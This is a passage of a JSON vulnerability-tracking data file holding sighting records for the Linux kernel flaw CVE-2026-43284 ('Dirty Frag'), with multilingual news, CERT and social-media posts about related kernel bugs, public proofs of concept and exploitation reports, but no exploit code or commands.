\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u043f\u0440\u043e\u0445\u043e\u0434\u044f\u0449\u0438\u0445 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044e \u0447\u0435\u0440\u0435\u0437 \u0445\u043e\u0441\u0442. \u0418\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u043f\u0440\u043e\u0434\u0430\u0451\u0442\u0441\u044f \u043d\u0430 \u043f\u043e\u0434\u043f\u043e\u043b\u044c\u043d\u044b\u0445 \u0444\u043e\u0440\u0443\u043c\u0430\u0445.\n\n\ud83d\udfe3 \u041e\u0442\u0447\u0451\u0442 \u043e \u043c\u0430\u0441\u0448\u0442\u0430\u0431\u043d\u043e\u0439 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 AitM, \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0432\u0448\u0435\u0439 \u0431\u043e\u043b\u0435\u0435 13000 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439 \u0432 26 \u0441\u0442\u0440\u0430\u043d\u0430\u0445. \u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e, \u0447\u0442\u043e \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442 \u0442\u0435\u043c\u0443 \u00ab\u043f\u0440\u0430\u0432\u0438\u043b \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f\u00bb (code of conduct). \n\n\ud83d\udfe3\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 IAM\u2011\u043a\u043b\u044e\u0447\u0438 \u0441\u043b\u0443\u0436\u0431 AWS, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0443\u0442\u0435\u043a\u043b\u0438 \u0432 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u0435 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438 \u0438 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u043d\u044b\u0435 \u043e\u0431\u0440\u0430\u0437\u044b. \u042d\u0442\u0438 \u043a\u043b\u044e\u0447\u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u0440\u0430\u0441\u0441\u044b\u043b\u0430\u0442\u044c \u0444\u0438\u0448\u0438\u043d\u0433 \u0438 \u043f\u0438\u0441\u044c\u043c\u0430 BEC \u0447\u0435\u0440\u0435\u0437 Amazon Simple Email Service. \u041f\u0438\u0441\u044c\u043c\u0430, \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u0438\u0437 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b AWS, \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u043f\u0440\u043e\u0445\u043e\u0434\u044f\u0442 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 SPF, DKIM \u0438 DMARC.\n\n\u2757\ufe0f \u0412\u0434\u043e\u0433\u043e\u043d\u043a\u0443 \u043a \u043e\u043f\u0430\u0441\u043d\u043e\u0439 Linux-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CopyFail (CVE-2026-31431), \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0443\u0436\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435, \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d \u0435\u0449\u0451 \u043e\u0434\u0438\u043d \u043f\u043e\u0445\u043e\u0436\u0438\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0434\u043b\u044f \u0441\u0442\u0430\u0431\u0438\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0434\u043e root. Dirty Frag (CVE-2026-43284 \u0438 \u201143500) \u0441 \u043f\u0435\u0440\u0432\u043e\u0433\u043e \u0436\u0435 \u0434\u043d\u044f \u0441\u043d\u0430\u0431\u0436\u0451\u043d \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u043c PoC \u0438 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0430  Ubuntu, RHEL, CentOS Stream, AlmaLinux, openSUSE, Tumbleweed \u0438 Fedora.\n\n#\u0434\u0430\u0439\u0434\u0436\u0435\u0441\u0442 #APT #\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 @\u041f2\u0422", "creation_timestamp": "2026-05-12T08:01:15.000000Z"}, {"uuid": "079f2388-7767-466d-b95f-eb55312aa359", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=1859", "content": "", "creation_timestamp": "2026-05-11T21:00:00.000000Z"}, {"uuid": "3c5d0ea2-cd43-489b-82a4-344593b259f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/cybergeodigest.bsky.social/post/3mll3k22l4g2s", "content": "Today's CyberGeoDigest \u2014 9 stories\n\nTop: Dirty Frag Linux Flaws CVE-2026-43284 and CVE-2026-43500 Exploited Before Patch\n\n#InfoSec #CVE #CyberSecurity", "creation_timestamp": "2026-05-11T10:41:20.312112Z"}, {"uuid": "251d9396-b9af-4990-9e55-ab604f133ff7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mll3pftazom2", "content": "Today's CyberGeoDigest \u2014 9 stories Top: Dirty Frag Linux Flaws CVE-2026-43284 and CVE-2026-43500 Exploited Before Patch #InfoSec #CVE #CyberSecurity\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-11T10:43:38.177229Z"}, {"uuid": "70276250-5458-4620-accd-c239b63a2f50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://t.me/GithubRedTeam/83783", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a vcheck\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a krisiasty\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Go\n\u2b50 Star\u6570\u91cf\uff1a 2  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-11 09:35:59\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nVulnerability detection and mitigation tool for Copy Fail and Dirty Frag bugs (CVE-2026-31431, CVE-2026-43284, CVE-2026-43500)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-11T10:00:04.000000Z"}, {"uuid": "440313a1-2af6-415a-9f84-40edb3ac07a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://t.me/information_security_channel/55241", "content": "New \u2018Dirty Frag\u2019 Linux Vulnerability Possibly Exploited in Attacks\nhttps://www.securityweek.com/new-dirty-frag-linux-vulnerability-possibly-exploited-in-attacks/\n\nAlso called Copy Fail 2 and tracked as CVE-2026-43284 and CVE-2026-43500, the exploit was disclosed before a patch was released.\nThe post New \u2018Dirty Frag\u2019 Linux Vulnerability Possibly Exploited in Attacks (https://www.securityweek.com/new-dirty-frag-linux-vulnerability-possibly-exploited-in-attacks/) appeared first on SecurityWeek (https://www.securityweek.com/).", "creation_timestamp": "2026-05-11T09:33:57.000000Z"}, {"uuid": "79798db2-0d29-4b0f-94fd-043bfb297507", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/suse-linux-kernel-multiple-vulnerabilities_20260506", "content": "", "creation_timestamp": "2026-05-05T18:00:00.000000Z"}, {"uuid": "2409f69e-a499-41a0-96de-345d29e378d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "Telegram/9XqhTISUbDUPo_c26c1BEinqDeNjvDc1gYqinuT1sIOuN_4", "content": "", "creation_timestamp": "2026-05-11T09:00:05.000000Z"}, {"uuid": "3353f45e-06d9-4adc-bb21-61658cc746df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "Telegram/HPf4rnJhTXs3qYpqLaPVxvSy_pHWUyjw5EcKhHnizBFydaU", "content": "", "creation_timestamp": "2026-05-10T09:00:05.000000Z"}, {"uuid": "350b68d5-ff10-437b-992a-886cddde297d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://www.acn.gov.it/portale/w/dirty-frag-poc-e-sfruttamento-di-vulnerabilita-per-l-elevazione-di-privilegi-in-linux", "content": "Disponibile un Proof of Concept (PoC) per \u201cDirty Frag\u201d, catena di sfruttamento delle vulnerabilit\u00e0 identificate tramite CVE-2026-43284 e CVE-2026-43500, relativa al Kernel Linux. La vulnerabilit\u00e0 interessa i moduli esp4 ed esp6 del sottosistema IPsec, utilizzato per la cifratura del traffico di rete e delle VPN, e il modulo rxrpc, utilizzato dal protocollo di rete AFS. La vulnerabilit\u00e0, qualora sfruttata, potrebbe consentire a un utente non privilegiato, l\u2019ottenimento di privilegi di root.", "creation_timestamp": "2026-05-08T09:21:59.000000Z"}, {"uuid": "f4ca549a-ce38-48f8-b20f-05138e2f44c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/Ubuntu.activitypub.awakari.com.ap.brid.gy/post/3mlnsnptoi3v2", "content": "Dirty Frag CVE-2026-43284 Exploited in Wild, Linux Patches Out Microsoft Defender confirmed limited in-the-wild exploitation of Dirty Frag CVE-2026-43284 in Linux, a deterministic LPE chain targeti...\n\n#CVE #Vulnerability #Alerts #Cybersecurity [\u2026] \n\n[Original post on dailysecurityreview.com]", "creation_timestamp": "2026-05-12T12:39:37.240811Z"}, {"uuid": "8beafa00-72c2-40d4-b096-a3ccfe6a10ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mlpb3on5ls2s", "content": "Top 3 CVE for last 7 days:\nCVE-2026-43284: 129 interactions\nCVE-2026-43500: 94 interactions\nCVE-2026-31431: 76 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-45185: 8 interactions\nCVE-2026-41940: 5 interactions\nCVE-2026-42208: 5 interactions\n", "creation_timestamp": "2026-05-13T02:30:28.898129Z"}, {"uuid": "223f8d22-d862-4673-9ae7-c64f16872eda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/opsmatters.com/post/3mlph64kntd2q", "content": "The latest update for #SafeBreach includes \"Dirty Frag Vulnerability (CVE-2026-43284 & CVE-2026-43500): Why Reliable #Linux Privilege Escalation Changes the Defense Equation\".\n\n#Cybersecurity https://opsmtrs.com/41NWGuQ", "creation_timestamp": "2026-05-13T04:19:13.424677Z"}, {"uuid": "7715c5c1-462c-45cc-bbcf-e398bd87143f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/debian-linux-kernel-multiple-vulnerabilities_20260506", "content": "", "creation_timestamp": "2026-05-05T20:00:00.000000Z"}, {"uuid": "479db8fe-d118-4216-ab90-8bdf655e2817", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://infosec.exchange/users/wdormann/statuses/116564950057858680", "content": "I put some words all in one place about Copy Fail CVE-2026-31431, Dirty Frag CVE-2026-43284 and CVE-2026-43500, and friends:https://tharros.com/copy-fail-dirty-frag-and-friends-linux-kernel-vulnerability-coordination-in-the-modern-world/", "creation_timestamp": "2026-05-13T02:40:02.123634Z"}, {"uuid": "aebfe0fa-0d7f-4eab-84af-ca3c4b6aed2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/wdormann.infosec.exchange.ap.brid.gy/post/3mlpbmfkh4vz2", "content": "I put some words all in one place about Copy Fail CVE-2026-31431, Dirty Frag CVE-2026-43284 and CVE-2026-43500, and friends:\nhttps://tharros.com/copy-fail-dirty-frag-and-friends-linux-kernel-vulnerability-coordination-in-the-modern-world/", "creation_timestamp": "2026-05-13T02:40:11.469718Z"}, {"uuid": "51a25b33-b65d-45dc-8f7c-9ece70a0f66b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://t.me/GithubRedTeam/84100", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-43284\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a FrosterDL\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-13 15:59:21\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-13T16:00:04.000000Z"}, {"uuid": "73271bd8-140f-46d9-ba69-eadde65a9d6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mlrrkr5rym2j", "content": "Top 3 CVE for last 7 days:\nCVE-2026-43284: 134 interactions\nCVE-2026-43500: 99 interactions\nCVE-2026-31431: 73 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-46300: 14 interactions\nCVE-2026-42945: 7 interactions\nCVE-2025-8088: 6 interactions\n", "creation_timestamp": "2026-05-14T02:30:34.094310Z"}, {"uuid": "4d2f5cc6-600c-4977-8d5b-fe644b878303", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "Telegram/O41s4ZacceniC-zmRdA20LKtlUfLN8dJaI2Rmc1hsAXigiA", "content": "", "creation_timestamp": "2026-05-13T21:00:04.000000Z"}, {"uuid": "0feee487-8b0e-465c-b6db-6a57811438ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "Telegram/no9VrmuWpYCotL5oqRbnMQdNuDYSzv-XRgybXr9t8F_k0Js", "content": "", "creation_timestamp": "2026-05-12T03:00:06.000000Z"}, {"uuid": "c3c9074a-4558-48a6-bd81-0ca5bb541380", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://t.me/true_secator/8202", "content": "\u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u043e\u0432 Linux \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0442 \u043d\u0430\u0434 \u0432\u044b\u043f\u0443\u0441\u043a\u043e\u043c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0439 \u0434\u043b\u044f \u043d\u043e\u0432\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u044f\u0434\u0440\u0430, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043a\u043e\u0434 \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 root.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430 \u043a\u0430\u043a\u00a0Fragnasia \u0438 \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043f\u043e\u0434 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u043e\u043c CVE-2026-46300.\n\n\u041e\u043d\u0430 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043b\u043e\u0433\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u043e\u0448\u0438\u0431\u043a\u043e\u0439 \u0432 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0435 Linux XFRM ESP-in-TCP, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0440\u0430\u0432\u0430 root, \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u0431\u0430\u0439\u0442\u044b \u0432 \u043a\u044d\u0448 \u0441\u0442\u0440\u0430\u043d\u0438\u0446 \u044f\u0434\u0440\u0430 \u0434\u043b\u044f \u0444\u0430\u0439\u043b\u043e\u0432 \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u043b\u044f \u0447\u0442\u0435\u043d\u0438\u044f.\n\n\u0420\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u0435 \u043f\u0440\u0438\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u0438\u0437 Zellic \u0423\u0438\u043b\u044c\u044f\u043c\u0443 \u0411\u043e\u0443\u043b\u0438\u043d\u0433\u0443, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u0434\u0435\u043b\u0438\u043b\u0441\u044f PoC, \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u044e\u0449\u0438\u043c \u043f\u0440\u0438\u043c\u0438\u0442\u0438\u0432 \u0437\u0430\u043f\u0438\u0441\u0438 \u0432 \u043f\u0430\u043c\u044f\u0442\u044c \u044f\u0434\u0440\u0430, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0439 \u0434\u043b\u044f \u043f\u043e\u0432\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f \u043a\u044d\u0448\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 /usr/bin/su \u0441 \u0446\u0435\u043b\u044c\u044e \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0438 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 root \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445.\n\n\u041a\u0430\u043a \u043e\u0442\u043c\u0435\u0442\u0438\u043b \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0441\u044f \u043a \u043a\u043b\u0430\u0441\u0441\u0443 Dirty Frag, \u043e \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u0441\u0442\u0430\u043b\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e \u043d\u0430 \u043f\u0440\u043e\u0448\u043b\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0435, \u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0441\u0435 \u044f\u0434\u0440\u0430 Linux, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u0435 \u0434\u043e 13 \u043c\u0430\u044f 2026 \u0433\u043e\u0434\u0430.\n\n\u041a\u0430\u043a \u0438 \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u0441 Fragnasia, \u0434\u043b\u044f Dirty Frag \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u043e\u0431\u0449\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0439 PoC, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0435 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u0440\u0430\u0432 root \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u0445 Linux.\n\n\u041e\u0434\u043d\u0430\u043a\u043e Dirty Frag \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0437\u0430 \u0441\u0447\u0435\u0442 \u043e\u0431\u044a\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u0434\u0432\u0443\u0445 \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u044f\u0434\u0440\u0430: \u043e\u0448\u0438\u0431\u043a\u0438 \u0437\u0430\u043f\u0438\u0441\u0438 \u0432 \u0441\u0442\u0440\u0430\u043d\u0438\u0447\u043d\u044b\u0439 \u043a\u044d\u0448 xfrm-ESP (CVE-2026-43284) \u0438 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0437\u0430\u043f\u0438\u0441\u0438 \u0432 \u0441\u0442\u0440\u0430\u043d\u0438\u0447\u043d\u044b\u0439 \u043a\u044d\u0448 RxRPC (CVE-2026-43500), \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u043f\u0443\u0442\u0435\u043c \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u0432 \u043f\u0430\u043c\u044f\u0442\u0438.\n\nFragnesia \u0445\u043e\u0442\u044c \u0438 \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0441\u044f \u043a \u043a\u043b\u0430\u0441\u0441\u0443 Dirty Frag, \u043d\u043e \u044d\u0442\u043e \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u0430\u044f \u043e\u0448\u0438\u0431\u043a\u0430 \u0432 ESP/XFRM, \u0434\u043b\u044f \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0431\u044b\u043b \u0432\u044b\u043f\u0443\u0449\u0435\u043d \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u044b\u0439 \u043f\u0430\u0442\u0447. \u041e\u0434\u043d\u0430\u043a\u043e \u043e\u043d\u0430 \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u043d\u0430 \u0442\u043e\u0439 \u0436\u0435 \u043f\u043e\u0432\u0435\u0440\u0445\u043d\u043e\u0441\u0442\u0438, \u0438 \u043c\u0435\u0440\u044b \u043f\u043e \u0435\u0435 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044e \u0442\u0430\u043a\u0438\u0435 \u0436\u0435, \u043a\u0430\u043a \u0438 \u0434\u043b\u044f dirtyfrag.\n\n\u041e\u043d \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043b\u043e\u0433\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u043e\u0448\u0438\u0431\u043a\u0443 \u0432 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0435 Linux XFRM ESP-in-TCP \u0434\u043b\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u0431\u0430\u0439\u0442\u043e\u0432 \u0432 \u043a\u044d\u0448 \u0441\u0442\u0440\u0430\u043d\u0438\u0446 \u044f\u0434\u0440\u0430 \u0444\u0430\u0439\u043b\u043e\u0432, \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u043b\u044f \u0447\u0442\u0435\u043d\u0438\u044f, \u0431\u0435\u0437 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u0438 \u0432\u043e\u0437\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u044f \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u044f \u0433\u043e\u043d\u043a\u0438.\n\n\u0414\u043b\u044f \u0437\u0430\u0449\u0438\u0442\u044b \u0441\u0438\u0441\u0442\u0435\u043c \u043e\u0442 \u0430\u0442\u0430\u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c Linux \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u043e\u0440\u0435\u0435 